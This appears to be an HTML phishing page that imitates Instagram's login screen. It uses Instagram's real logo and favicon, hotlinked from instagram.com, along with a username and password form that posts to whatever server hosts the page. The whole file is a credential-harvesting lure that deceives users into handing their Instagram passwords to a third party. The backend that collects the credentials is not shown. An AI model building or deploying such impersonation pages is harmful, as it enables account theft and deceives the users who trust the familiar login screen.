<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Instagram</title>
  <link rel="stylesheet" href="/static/css/style.css">
  <link rel="icon" href="https://www.instagram.com/static/images/ico/favicon.ico/36b3ee2d91ed.ico">
  <meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
  <div class="container">
    <div class="login-box">
      <img src="https://www.instagram.com/static/images/web/mobile_nav_type_logo.png/735145cfe0a4.png" alt="Instagram">
      <form method="post">
        <input type="text" name="username" placeholder="Phone number, username, or email" required>
        <input type="password" name="password" placeholder="Password" required>
        <button type="submit">Log In</button>
      </form>
      <div class="or"><span>OR</span></div>
      <div class="fb-login">Log in with Facebook</div>
      <div class="forgot">Forgot password?</div>
    </div>
    <div class="signup-box">
      Don’t have an account? <a href="#">Sign up</a>
    </div>
  </div>
</body>
</html>